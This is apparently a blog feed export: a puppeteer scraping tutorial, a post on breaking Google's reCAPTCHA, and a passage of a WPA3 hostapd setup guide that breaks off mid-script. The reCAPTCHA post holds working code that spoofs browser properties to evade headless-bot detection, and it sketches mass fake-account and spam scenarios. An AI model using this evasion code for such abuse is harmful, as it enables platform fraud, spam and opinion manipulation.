<li>There must be at least N=6 objects within a container to be considered recurring structure</li>
</ol>
<p>When websites protect themselves against web scraping on the HTML level, they need to present a website to the non malicious visitor at some point. And our approach is to extract this information at exactly the point after rendering.</p>
<h3>Algorithm Description</h3>
<p><strong>In a first step, we find potential structure candidates:</strong></p>
<p>Take a starting node as input. If no node is given, use the <code>body</code> element.</p>
<p>See if the element contains at least <em>N</em> identical elements (such as div, article, li, section, ...). If yes, mark those child nodes as potential structure candidates.</p>
<p>Visit the next node in the tree and check again for <em>N</em> identical elements.</p>
<p>After all candidates have been found, get the bonding boxes of the candidates with <code>getBoundingClientRect()</code> If the bounding boxes vertically and horizontally align, have more or less identical dimensions, and make up a significant part of <code>document.body.getBoundingClientRect()</code>, add those elements to the potential structures. There are further tests possible.</p>
<p><strong>In a second step, we cross correlate the contents of the structure candidates</strong> and filter out objects that are not similar enough: We compare the items within the potential structures. If they share common characteristics, we consider those elements to form a valid structure. We are only interested in <code>img</code>, <code>a</code> and <code>textNode</code>. Furthermore, we consider only visible nodes.</p>
<p>Example: If we find 8 results in a google search, all those results essentially have a title (link with text), a visible link in green font (this is only green text and a child node of the title) and a snippet. The snippet typically consists of many different text nodes. Therefore one potential filter could be:</p>
<ol>
<li>Each object must have a link with text with font size <code>X</code> at the beginning of the object.</li>
<li>There must be a textNode with green font after this title.</li>
<li>There must be some text after this green colored text.</li>
</ol>
<h3>Downsides</h3>
<p>Because our algorithm is abstract, the JSON output cannot have reasonable variable names. The algorithm cannot know which text of the object is the title, which part is a price, what is a date, and so on. This means that a post data-extraction step is necessary to match variable names to the output.</p>
<p>Furthermore, we cannot reliably know the correct <em>N</em> that specifies how many recurring elements should be in a structure. It depends on the website.</p>
<h2>Run struktur yourself</h2>
<p>Enough talking, you can test <strong>struktur.js</strong> in the following way. First download <a href="https://github.com/NikolaiT/struktur/blob/master/struktur.js"><strong>struktur.js</strong></a> and put it in the same path as the following script:</p>
<div class="highlight"><pre><span></span><code><span class="c1">// puppeteer-extra is a drop-in replacement for puppeteer,</span>
<span class="c1">// it augments the installed puppeteer with plugin functionality</span>
<span class="kd">const</span> <span class="nx">puppeteer</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s2">"puppeteer-extra"</span><span class="p">);</span>
<span class="c1">// add stealth plugin and use defaults (all evasion techniques)</span>
<span class="kd">const</span> <span class="nx">pluginStealth</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="s2">"puppeteer-extra-plugin-stealth"</span><span class="p">);</span>
<span class="nx">puppeteer</span><span class="p">.</span><span class="nx">use</span><span class="p">(</span><span class="nx">pluginStealth</span><span class="p">());</span>
<span class="kd">const</span> <span class="nx">config</span> <span class="o">=</span> <span class="p">{</span>
<span class="nx">urls</span><span class="o">:</span> <span class="p">{</span>
<span class="s1">'google'</span><span class="o">:</span> <span class="s1">'https://www.google.de/search?q=europe+news'</span><span class="p">,</span>
<span class="p">},</span>
<span class="nx">chrome_flags</span><span class="o">:</span> <span class="p">[</span>
<span class="s1">'--disable-infobars'</span><span class="p">,</span>
<span class="s1">'--window-position=0,0'</span><span class="p">,</span>
<span class="s1">'--ignore-certifcate-errors'</span><span class="p">,</span>
<span class="s1">'--ignore-certifcate-errors-spki-list'</span><span class="p">,</span>
<span class="s1">'--window-size=1920,1040'</span><span class="p">,</span>
<span class="s1">'--start-fullscreen'</span><span class="p">,</span>
<span class="s1">'--hide-scrollbars'</span><span class="p">,</span>
<span class="s1">'--disable-notifications'</span><span class="p">,</span>
<span class="p">],</span>
<span class="p">};</span>
<span class="nx">puppeteer</span><span class="p">.</span><span class="nx">launch</span><span class="p">({</span> <span class="nx">headless</span><span class="o">:</span> <span class="kc">false</span><span class="p">,</span> <span class="nx">args</span><span class="o">:</span> <span class="nx">config</span><span class="p">.</span><span class="nx">chrome_flags</span> <span class="p">}).</span><span class="nx">then</span><span class="p">(</span><span class="k">async</span> <span class="nx">browser</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">page</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">newPage</span><span class="p">();</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">setBypassCSP</span><span class="p">(</span><span class="kc">true</span><span class="p">);</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">setViewport</span><span class="p">({</span> <span class="nx">width</span><span class="o">:</span> <span class="mf">1920</span><span class="p">,</span> <span class="nx">height</span><span class="o">:</span> <span class="mf">1040</span> <span class="p">});</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="kr">goto</span><span class="p">(</span><span class="nx">config</span><span class="p">.</span><span class="nx">urls</span><span class="p">.</span><span class="nx">google</span><span class="p">,</span> <span class="p">{</span><span class="nx">waitUntil</span><span class="o">:</span> <span class="s1">'networkidle0'</span><span class="p">});</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">waitFor</span><span class="p">(</span><span class="mf">1000</span><span class="p">);</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">addScriptTag</span><span class="p">({</span><span class="nx">path</span><span class="o">:</span> <span class="s1">'struktur.js'</span><span class="p">});</span>
<span class="kd">var</span> <span class="nx">results</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">evaluate</span><span class="p">(()</span> <span class="p">=></span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">struktur</span><span class="p">({</span>
<span class="nx">N</span><span class="o">:</span> <span class="mf">7</span><span class="p">,</span>
<span class="nx">highlightStruktur</span><span class="o">:</span> <span class="kc">true</span><span class="p">,</span>
<span class="nx">highlightContent</span><span class="o">:</span> <span class="kc">true</span><span class="p">,</span>
<span class="nx">addClass</span><span class="o">:</span> <span class="kc">false</span><span class="p">,</span>
<span class="p">});</span>
<span class="p">});</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">waitFor</span><span class="p">(</span><span class="mf">1000</span><span class="p">);</span>
<span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">results</span><span class="p">);</span>
<span class="k">await</span> <span class="nx">browser</span><span class="p">.</span><span class="nx">close</span><span class="p">();</span>
<span class="p">});</span>
</code></pre></div>
<p>Then install dependencies with</p>
<div class="highlight"><pre><span></span><code>npm i
</code></pre></div>
<p>And run the above script with <code>node</code>. You will see the found structure of the google search made as JSON. You can specify any other website you want.</p>Breaking Google's Recaptcha2019-03-01T16:00:00+01:002019-03-01T16:00:00+01:00Nikolai Tschachertag:incolumitas.com,2019-03-01:/2019/03/01/breaking-googles-recaptcha/<p>A captcha is a mechanism to distinguish human users from automated programs (bot). There are many service providers in the Internet that have a major incentive to prevent bots from (ab)using their systems.</p><p>A captcha is a mechanism to distinguish human users from automated programs (bot). There are many service providers in the Internet that have a major incentive to prevent bots from (ab)using their systems.</p>
<p>Imagine if there was a reliable method to break Google's famous <a href="https://developers.google.com/recaptcha/docs/versions">reCAPTCHA v2 or the new reCAPTCHA v3</a> ([<a href="https://webmasters.googleblog.com/2018/10/introducing-recaptcha-v3-new-way-to.html">released</a> in late 2018). The following scenarios would be possible:</p>
<ol>
<li>
<p>Mass creation of accounts on sites such as <a href="https://www.reddit.com/">Reddit.com</a> in order to build <em>fake Internet personas</em>. After letting those fake bots randomly post on subreddits trivial but undetectable comments, you can slowly let those bots start to <strong>manipulate the public opinion</strong> by downvoting, upvoting or posting political comments. This scenario is already reality and I don't actually want to know how strong the public opinion will be manipulated in the upcoming 2020 elections in the United States.</p>
</li>
<li>
<p>You could create fake gmail accounts automatically. Of course gmail requires you to have a valid phone number for each new account. Because phone numbers are a limited resource, this will be your bottleneck. Services such as <a href="http://smspva.com/">SMSPva</a> allow you to register virtual phone numbers from any country. This plus an automated way to solve captchas allows you to create gmail accounts en masse and proceed to spam with the highly trusted gmail.com MX domain.</p>
</li>
</ol>
<h3>Current State of Research</h3>
<p>There were a couple of papers in the past years that investigated Google's anti bot defenses. It is clear that the defenses are not solely based on solving a captcha puzzle, the system processes many sources of human behavior in order to make a final statement about the <em>humanness</em> of the interacting agent. Examples are:</p>
<ul>
<li>Can the program that sends the HTTP requests execute javascript?</li>
<li>Check that the user agent string is valid. Also check that the technical capabilities reported by the browser matches to what is advertised in the user agent string (very important!)</li>
<li>See if the browser has valid plugins, valid screen resolution, time zone of the client/browser</li>
<li>Monitor execution time of javascript</li>
<li>Number of mouse clicks, whether the mouse movement is organic or not, number of clicks</li>
<li>How much time between actions passed</li>
<li>Keyboard strokes or touch actions</li>
<li>A wide range of browser specific functions and CSS rules, canvas rendering properties</li>
<li>State is saved in a server side tracking cookie</li>
<li>Is the browser automated by browser automation software such as selenium or <a href="https://github.com/GoogleChrome/puppeteer">puppeteer</a>? There are many different technical details that leak that you are using browser automation software. <a href="https://github.com/paulirish/headless-cat-n-mouse">This github repository</a> and <a href="https://intoli.com/blog/not-possible-to-block-chrome-headless/">this blog post</a> discusses them in detail. </li>
</ul>
<p>For example, we at <a href="https://scrapeulous.com/">scrapeulous.com</a> use the following code to prevent search engines from detecting that we are automating browsers:</p>
<div class="highlight"><pre><span></span><code><span class="c1">// This is where we'll put the code to get around the tests.</span>
<span class="k">async</span> <span class="kd">function</span> <span class="nx">evadeChromeHeadlessDetection</span><span class="p">(</span><span class="nx">page</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// Pass the Webdriver Test.</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">evaluateOnNewDocument</span><span class="p">(()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">newProto</span> <span class="o">=</span> <span class="nx">navigator</span><span class="p">.</span><span class="nx">__proto__</span><span class="p">;</span>
<span class="ow">delete</span> <span class="nx">newProto</span><span class="p">.</span><span class="nx">webdriver</span><span class="p">;</span>
<span class="nx">navigator</span><span class="p">.</span><span class="nx">__proto__</span> <span class="o">=</span> <span class="nx">newProto</span><span class="p">;</span>
<span class="p">});</span>
<span class="c1">// Pass the Chrome Test.</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">evaluateOnNewDocument</span><span class="p">(()</span> <span class="p">=></span> <span class="p">{</span>
<span class="c1">// We can mock this in as much depth as we need for the test.</span>
<span class="kd">const</span> <span class="nx">mockObj</span> <span class="o">=</span> <span class="p">{</span>
<span class="nx">app</span><span class="o">:</span> <span class="p">{</span>
<span class="nx">isInstalled</span><span class="o">:</span> <span class="kc">false</span><span class="p">,</span>
<span class="p">},</span>
<span class="nx">webstore</span><span class="o">:</span> <span class="p">{</span>
<span class="nx">onInstallStageChanged</span><span class="o">:</span> <span class="p">{},</span>
<span class="nx">onDownloadProgress</span><span class="o">:</span> <span class="p">{},</span>
<span class="p">},</span>
<span class="nx">runtime</span><span class="o">:</span> <span class="p">{</span>
<span class="nx">PlatformOs</span><span class="o">:</span> <span class="p">{</span>
<span class="nx">MAC</span><span class="o">:</span> <span class="s1">'mac'</span><span class="p">,</span>
<span class="nx">WIN</span><span class="o">:</span> <span class="s1">'win'</span><span class="p">,</span>
<span class="nx">ANDROID</span><span class="o">:</span> <span class="s1">'android'</span><span class="p">,</span>
<span class="nx">CROS</span><span class="o">:</span> <span class="s1">'cros'</span><span class="p">,</span>
<span class="nx">LINUX</span><span class="o">:</span> <span class="s1">'linux'</span><span class="p">,</span>
<span class="nx">OPENBSD</span><span class="o">:</span> <span class="s1">'openbsd'</span><span class="p">,</span>
<span class="p">},</span>
<span class="nx">PlatformArch</span><span class="o">:</span> <span class="p">{</span>
<span class="nx">ARM</span><span class="o">:</span> <span class="s1">'arm'</span><span class="p">,</span>
<span class="nx">X86_32</span><span class="o">:</span> <span class="s1">'x86-32'</span><span class="p">,</span>
<span class="nx">X86_64</span><span class="o">:</span> <span class="s1">'x86-64'</span><span class="p">,</span>
<span class="p">},</span>
<span class="nx">PlatformNaclArch</span><span class="o">:</span> <span class="p">{</span>
<span class="nx">ARM</span><span class="o">:</span> <span class="s1">'arm'</span><span class="p">,</span>
<span class="nx">X86_32</span><span class="o">:</span> <span class="s1">'x86-32'</span><span class="p">,</span>
<span class="nx">X86_64</span><span class="o">:</span> <span class="s1">'x86-64'</span><span class="p">,</span>
<span class="p">},</span>
<span class="nx">RequestUpdateCheckStatus</span><span class="o">:</span> <span class="p">{</span>
<span class="nx">THROTTLED</span><span class="o">:</span> <span class="s1">'throttled'</span><span class="p">,</span>
<span class="nx">NO_UPDATE</span><span class="o">:</span> <span class="s1">'no_update'</span><span class="p">,</span>
<span class="nx">UPDATE_AVAILABLE</span><span class="o">:</span> <span class="s1">'update_available'</span><span class="p">,</span>
<span class="p">},</span>
<span class="nx">OnInstalledReason</span><span class="o">:</span> <span class="p">{</span>
<span class="nx">INSTALL</span><span class="o">:</span> <span class="s1">'install'</span><span class="p">,</span>
<span class="nx">UPDATE</span><span class="o">:</span> <span class="s1">'update'</span><span class="p">,</span>
<span class="nx">CHROME_UPDATE</span><span class="o">:</span> <span class="s1">'chrome_update'</span><span class="p">,</span>
<span class="nx">SHARED_MODULE_UPDATE</span><span class="o">:</span> <span class="s1">'shared_module_update'</span><span class="p">,</span>
<span class="p">},</span>
<span class="nx">OnRestartRequiredReason</span><span class="o">:</span> <span class="p">{</span>
<span class="nx">APP_UPDATE</span><span class="o">:</span> <span class="s1">'app_update'</span><span class="p">,</span>
<span class="nx">OS_UPDATE</span><span class="o">:</span> <span class="s1">'os_update'</span><span class="p">,</span>
<span class="nx">PERIODIC</span><span class="o">:</span> <span class="s1">'periodic'</span><span class="p">,</span>
<span class="p">},</span>
<span class="p">},</span>
<span class="p">};</span>
<span class="nb">window</span><span class="p">.</span><span class="nx">navigator</span><span class="p">.</span><span class="nx">chrome</span> <span class="o">=</span> <span class="nx">mockObj</span><span class="p">;</span>
<span class="nb">window</span><span class="p">.</span><span class="nx">chrome</span> <span class="o">=</span> <span class="nx">mockObj</span><span class="p">;</span>
<span class="p">});</span>
<span class="c1">// Pass the Permissions Test.</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">evaluateOnNewDocument</span><span class="p">(()</span> <span class="p">=></span> <span class="p">{</span>
<span class="kd">const</span> <span class="nx">originalQuery</span> <span class="o">=</span> <span class="nb">window</span><span class="p">.</span><span class="nx">navigator</span><span class="p">.</span><span class="nx">permissions</span><span class="p">.</span><span class="nx">query</span><span class="p">;</span>
<span class="nb">window</span><span class="p">.</span><span class="nx">navigator</span><span class="p">.</span><span class="nx">permissions</span><span class="p">.</span><span class="nx">__proto__</span><span class="p">.</span><span class="nx">query</span> <span class="o">=</span> <span class="nx">parameters</span> <span class="p">=></span>
<span class="nx">parameters</span><span class="p">.</span><span class="nx">name</span> <span class="o">===</span> <span class="s1">'notifications'</span>
<span class="o">?</span> <span class="nb">Promise</span><span class="p">.</span><span class="nx">resolve</span><span class="p">({</span><span class="nx">state</span><span class="o">:</span> <span class="nx">Notification</span><span class="p">.</span><span class="nx">permission</span><span class="p">})</span>
<span class="o">:</span> <span class="nx">originalQuery</span><span class="p">(</span><span class="nx">parameters</span><span class="p">);</span>
<span class="c1">// Inspired by: https://github.com/ikarienator/phantomjs_hide_and_seek/blob/master/5.spoofFunctionBind.js</span>
<span class="kd">const</span> <span class="nx">oldCall</span> <span class="o">=</span> <span class="nb">Function</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">call</span><span class="p">;</span>
<span class="kd">function</span> <span class="nx">call</span><span class="p">()</span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">oldCall</span><span class="p">.</span><span class="nx">apply</span><span class="p">(</span><span class="k">this</span><span class="p">,</span> <span class="nx">arguments</span><span class="p">);</span>
<span class="p">}</span>
<span class="nb">Function</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">call</span> <span class="o">=</span> <span class="nx">call</span><span class="p">;</span>
<span class="kd">const</span> <span class="nx">nativeToStringFunctionString</span> <span class="o">=</span> <span class="ne">Error</span><span class="p">.</span><span class="nx">toString</span><span class="p">().</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/Error/g</span><span class="p">,</span> <span class="s2">"toString"</span><span class="p">);</span>
<span class="kd">const</span> <span class="nx">oldToString</span> <span class="o">=</span> <span class="nb">Function</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">toString</span><span class="p">;</span>
<span class="kd">function</span> <span class="nx">functionToString</span><span class="p">()</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="k">this</span> <span class="o">===</span> <span class="nb">window</span><span class="p">.</span><span class="nx">navigator</span><span class="p">.</span><span class="nx">permissions</span><span class="p">.</span><span class="nx">query</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="s2">"function query() { [native code] }"</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="k">this</span> <span class="o">===</span> <span class="nx">functionToString</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="nx">nativeToStringFunctionString</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nx">oldCall</span><span class="p">.</span><span class="nx">call</span><span class="p">(</span><span class="nx">oldToString</span><span class="p">,</span> <span class="k">this</span><span class="p">);</span>
<span class="p">}</span>
<span class="nb">Function</span><span class="p">.</span><span class="nx">prototype</span><span class="p">.</span><span class="nx">toString</span> <span class="o">=</span> <span class="nx">functionToString</span><span class="p">;</span>
<span class="p">});</span>
<span class="c1">// Pass the Plugins Length Test.</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">evaluateOnNewDocument</span><span class="p">(()</span> <span class="p">=></span> <span class="p">{</span>
<span class="c1">// Overwrite the `plugins` property to use a custom getter.</span>
<span class="nb">Object</span><span class="p">.</span><span class="nx">defineProperty</span><span class="p">(</span><span class="nx">navigator</span><span class="p">,</span> <span class="s1">'plugins'</span><span class="p">,</span> <span class="p">{</span>
<span class="c1">// This just needs to have `length > 0` for the current test,</span>
<span class="c1">// but we could mock the plugins too if necessary.</span>
<span class="nx">get</span><span class="o">:</span> <span class="p">()</span> <span class="p">=></span> <span class="p">[</span><span class="mf">1</span><span class="p">,</span> <span class="mf">2</span><span class="p">,</span> <span class="mf">3</span><span class="p">,</span> <span class="mf">4</span><span class="p">,</span> <span class="mf">5</span><span class="p">]</span>
<span class="p">});</span>
<span class="p">});</span>
<span class="c1">// Pass the Languages Test.</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">evaluateOnNewDocument</span><span class="p">(()</span> <span class="p">=></span> <span class="p">{</span>
<span class="c1">// Overwrite the `plugins` property to use a custom getter.</span>
<span class="nb">Object</span><span class="p">.</span><span class="nx">defineProperty</span><span class="p">(</span><span class="nx">navigator</span><span class="p">,</span> <span class="s1">'languages'</span><span class="p">,</span> <span class="p">{</span>
<span class="nx">get</span><span class="o">:</span> <span class="p">()</span> <span class="p">=></span> <span class="p">[</span><span class="s1">'en-US'</span><span class="p">,</span> <span class="s1">'en'</span><span class="p">]</span>
<span class="p">});</span>
<span class="p">});</span>
<span class="c1">// Pass the iframe Test</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">evaluateOnNewDocument</span><span class="p">(()</span> <span class="p">=></span> <span class="p">{</span>
<span class="nb">Object</span><span class="p">.</span><span class="nx">defineProperty</span><span class="p">(</span><span class="nx">HTMLIFrameElement</span><span class="p">.</span><span class="nx">prototype</span><span class="p">,</span> <span class="s1">'contentWindow'</span><span class="p">,</span> <span class="p">{</span>
<span class="nx">get</span><span class="o">:</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="k">return</span> <span class="nb">window</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">});</span>
<span class="p">});</span>
<span class="c1">// Pass toString test, though it breaks console.debug() from working</span>
<span class="k">await</span> <span class="nx">page</span><span class="p">.</span><span class="nx">evaluateOnNewDocument</span><span class="p">(()</span> <span class="p">=></span> <span class="p">{</span>
<span class="nb">window</span><span class="p">.</span><span class="nx">console</span><span class="p">.</span><span class="nx">debug</span> <span class="o">=</span> <span class="p">()</span> <span class="p">=></span> <span class="p">{</span>
<span class="k">return</span> <span class="kc">null</span><span class="p">;</span>
<span class="p">};</span>
<span class="p">});</span>
<span class="p">}</span>
</code></pre></div>
<p>The code above is directly suited for the browser automation library puppeteer. You can also pass certain configuration parameters to chromium in order to increase the speed of web scraping. For example in the search engine scraping library <a href="https://github.com/NikolaiT/se-scraper">se-scraper</a> we use the following flags to increase browsing speed:</p>
<div class="highlight"><pre><span></span><code><span class="c1">// pass those to the puppeteer constructor</span>
<span class="kd">var</span> <span class="nx">ADDITIONAL_CHROME_FLAGS</span> <span class="o">=</span> <span class="p">[</span>
<span class="s1">'--disable-infobars'</span><span class="p">,</span>
<span class="s1">'--window-position=0,0'</span><span class="p">,</span>
<span class="s1">'--ignore-certifcate-errors'</span><span class="p">,</span>
<span class="s1">'--ignore-certifcate-errors-spki-list'</span><span class="p">,</span>
<span class="s1">'--no-sandbox'</span><span class="p">,</span>
<span class="s1">'--disable-setuid-sandbox'</span><span class="p">,</span>
<span class="s1">'--disable-dev-shm-usage'</span><span class="p">,</span>
<span class="s1">'--disable-accelerated-2d-canvas'</span><span class="p">,</span>
<span class="s1">'--disable-gpu'</span><span class="p">,</span>
<span class="s1">'--window-size=1920x1080'</span><span class="p">,</span>
<span class="s1">'--hide-scrollbars'</span><span class="p">,</span>
<span class="p">];</span>
</code></pre></div>
<p>All this information is collected by reCAPTCHA system from Google. The longer a user appears human, the weaker the captcha problems become.</p>
<h3>Attacks on reCAPTCHA</h3>
<p>In early 2019, researches from the University of Maryland have published <a href="https://github.com/ecthros/uncaptcha2">uncaptcha2</a>, a method to break Google's audio reCAPTCHA with up to <strong>90% accuracy</strong>.</p>
<p>In short, in each reCAPTCHA v2 offers for reasons of accessibility two methods to solve an captcha: </p>
<ol>
<li>Solving some image related task such as finding a fucking fire hydrant</li>
<li>Listen to an audio challenge and type in the words you hear</li>
</ol>
<p>In turns out that the public speech recognition API's offered for free from services such as <strong>Google Speech-To-Text API (the Irony)</strong> or <strong>Microsoft Bing Voice Recognition API</strong> are capable of solving the audio captcha with a acceptance rate up to 90%.</p>
<p>This means that those systems are broken by design.</p>
<h3>Future with reCAPTCHA v3</h3>
<p>I haven't used reCAPTCHA v3 myself, but Google completely shifts the center of focus away from direct user interaction to a more system-dependent approach.</p>
<p>reCAPTCHA v3 can be configured on all forms and inputs where human people can interact with a web application. It then collects data in the background and feeds a machine learning application that learns how to distinguish spammers from legit users.</p>
<p>Developers can see which elements are interacted in what way in a Google Administration Panel and can then decide what behavior can be considered non-abusive.</p>
<p>Google returns a score between 0 and 1 that determines how likely the action originates from a bot. The developer has then the responsibility to decide how to act given a certain score.</p>
<h3>Sources</h3>
<ol>
<li>https://github.com/ecthros/uncaptcha2</li>
<li>Bock, Kevin, et al. "unCaptcha: a low-resource defeat of recaptcha's audio challenge." Proceedings of the 11th USENIX Conference on Offensive Technologies. USENIX Association, 2017.</li>
<li><a href="https://www.blackhat.com/docs/asia-16/materials/asia-16-Sivakorn-Im-Not-a-Human-Breaking-the-Google-reCAPTCHA-wp.pdf">I'm not a human: Breaking the Google reCAPTCHA - Black Hat</a></li>
<li><a href="https://webmasters.googleblog.com/2018/10/introducing-recaptcha-v3-new-way-to.html">Introducing reCAPTCHA v3: the new way to stop bots</a></li>
</ol>Running a WPA3 access point with hostapd 2.7 and SAE/Dragonfly2019-02-22T18:15:00+01:002020-12-31T13:15:00+01:00Nikolai Tschachertag:incolumitas.com,2019-02-22:/2019/02/22/running-a-WPA3-access-point-with-hostapd-SAE-Dragonfly/<p>Tutorial that shows how to run an WPA3 access point with hostapd 2.7 and SAE Dragonfly Handshake.</p><p>In my master thesis at HU Berlin I investigate the simultaneous authentication of equals (SAE)
protocol that is going to be used as part of the WPA3 certification. </p>
<p>In the broadest sense I will investigate the security of the new SAE authentication mechanism and the interaction
with the 4-way-handshake.</p>
<p>This handshake (also referred to as Dragonfly) brings two major advantages compared to the well known WPA/WPA2 authentication:</p>
<ol>
<li>
<p>Dragonfly/SAE is resistant against offline dictionary attacks. Guesses on the password
can only happen while interacting with the protocol in a life handshake negotiation session.</p>
</li>
<li>
<p>Dragonfly/SAE provides perfect forward secrecy. This means that an attacker cannot
decrypt traffic that he captured in the past when he learns the decryption key in the present.</p>
</li>
</ol>
<p>Those two major advantages will be present in devices that are certified by the WPA3 certification program.
Devices that support WPA3 are already on the market and are expected to be widely adopted in the near
future.</p>
<p>In this tutorial I will explain how to setup a WPA3 network on my laptop.</p>
<p>Unfortunately I could not setup a WPA3 network that makes use of <strong><a href="https://en.wikipedia.org/wiki/IEEE_802.11w-2009">protected management frames = IEEE 802.11w</a></strong></p>
<p>The reason is most likely that the device drivers do not support PMF.</p>
<p>For a WPA3 certified device, PMF are necessary, therefore the network we create in this tutorial is not a complete WPA3 certified network.</p>
<h3>Setup</h3>
<p>In my case I have a Ubuntu 18.04 on my laptop and Kali Linux 2019.1 in a VMWare virtual machine.</p>
<p>I have three 802.11 network devices. </p>
<ol>
<li>One integrated wireless card in my laptop: </li>
</ol>
<div class="highlight"><pre><span></span><code>$ lspci -k
02:00.0 Network controller: Intel Corporation Centrino Advanced-N 6235 (rev 24)
Subsystem: Intel Corporation Centrino Advanced-N 6235 AGN
Kernel driver in use: iwlwifi
Kernel modules: iwlwifi
</code></pre></div>
<ol>
<li>
<p>The Alfa dual band AWUS036ACH USB NIC. This is the driver I used: https://github.com/aircrack-ng/rtl8812au
To install the driver, read this blog post: https://forums.hak5.org/topic/43124-alfa-awus036ach-kali-configuration-guide/
We will not use this device in this tutorial, because it caused me too much headache and trouble.</p>
</li>
<li>
<p>A Panda N600 Wireless USB adapter using a Ralink chipset</p>
</li>
</ol>
<p>I run <strong>the access point on the kali machine with hostapd version 2.7</strong>. I will use the Panda N600 Wireless USB adapter for the access point.</p>
<p>The <strong>supplicant will run on the host machine of my laptop</strong>. I will use my integrated Centrino Advanced-N 6235 AGN as the network card of the supplicant.</p>
<p>This setup means that 802.11 network is not mere hardware simulated, all frames are sent over the air!</p>
<h3>Compile Hostapd on Kali Linux 2019.1</h3>
<p>All commands are executed from within the virtual machine running Kali Linux 2019.1</p>
<p>Download and extract the latest version of hostapd:</p>
<div class="highlight"><pre><span></span><code>wget https://w1.fi/releases/hostapd-2.7.tar.gz
tar xzvf hostapd-2.7.tar.gz
<span class="nb">cd</span> hostapd-2.7/hostapd
</code></pre></div>
<p>After downloading the sources of hostapd, we need to install several packages/libraries that are necessary to compile hostapd and the supplicant.</p>
<div class="highlight"><pre><span></span><code>apt install pkg-config
apt install libnl-3-dev
apt install libssl-dev
apt install libnl-genl-3-dev
</code></pre></div>
<p>Append the following lines to the end of the <strong>defconfig</strong> file:</p>
<div class="highlight"><pre><span></span><code>CONFIG_SAE=y
</code></pre></div>
<p>then compile hostapd</p>
<div class="highlight"><pre><span></span><code>cp defconfig .config
make -j <span class="m">2</span>
<span class="nb">cd</span> ..
</code></pre></div>
<p>Now you should have a fresh binary <strong>hostapd</strong> that is compiled to support SAE as key management.</p>
<p>You can confirm that by running</p>
<div class="highlight"><pre><span></span><code>/hostapd-2.7/hostapd$ ./hostapd -v
hostapd v2.7
User space daemon for IEEE 802.11 AP management,
IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator
Copyright (c) 2002-2018, Jouni Malinen <j@w1.fi> and contributors
</code></pre></div>
<h3>Configure Hostapd to use SAE/Dragonfly</h3>
<p>This is the configuration file (<strong>wpa3.conf</strong>) for hostapd that enbables WPA3 authentication:</p>
<div class="highlight"><pre><span></span><code>interface=wlan0
ssid=WPA3-Network
hw_mode=g
channel=1
wpa=2
wpa_passphrase=abcdefgh
wpa_key_mgmt=SAE
rsn_pairwise=CCMP
#ieee80211w=2
</code></pre></div>
<p>The line <code>wpa_key_mgmt=SAE</code> is the crucial part. It tells hostapd to use SAE as key management protocol.</p>
<p>Before you start hostapd, it's necessary to kill some programs that might interfere with hostapd.</p>
<p>My <strong>/etc/NetworkManager/NetworkManager.conf</strong> looks like this:</p>
<div class="highlight"><pre><span></span><code><span class="k">[main]</span><span class="w"></span>
<span class="na">plugins</span><span class="o">=</span><span class="s">ifupdown,keyfile</span><span class="w"></span>
<span class="k">[ifupdown]</span><span class="w"></span>
<span class="na">managed</span><span class="o">=</span><span class="s">false</span><span class="w"></span>
<span class="k">[device]</span><span class="w"></span>
<span class="na">wifi.scan-rand-mac-address</span><span class="o">=</span><span class="s">no</span><span class="w"></span>
</code></pre></div>
<p>I created this script (<strong>prepare.sh</strong>) to stop the potentially interfering network-manager:</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/bin/bash</span>
<span class="k">if</span> <span class="o">[</span> -z <span class="s2">"</span><span class="nv">$1</span><span class="s2">"</span> <span class="o">]</span>
<span class="k">then</span>
<span class="nb">echo</span> <span class="s2">"please specify interface as first arg"</span><span class="p">;</span>
<span class="k">else</span>
<span class="c1"># use airmon to stop interfering processes</span>
sudo airmon-ng check <span class="nb">kill</span>
<span class="c1"># then stop network manager</span>
<span class="c1"># because airmon doesn't do a good job</span>
sudo service network-manager stop
<span class="c1"># enable hardware sim</span>
<span class="c1">#sudo modprobe mac80211_hwsim radios=3</span>
rfkill unblock wifi
<span class="c1"># Optionally kill other Wi-Fi clients the brute-for way:</span>
sudo pkill wpa_supplicant
<span class="c1"># Put the interface in monitor mode the old fashioned way</span>
<span class="c1"># Probably not necessary</span>
sudo ifconfig <span class="nv">$1</span> down
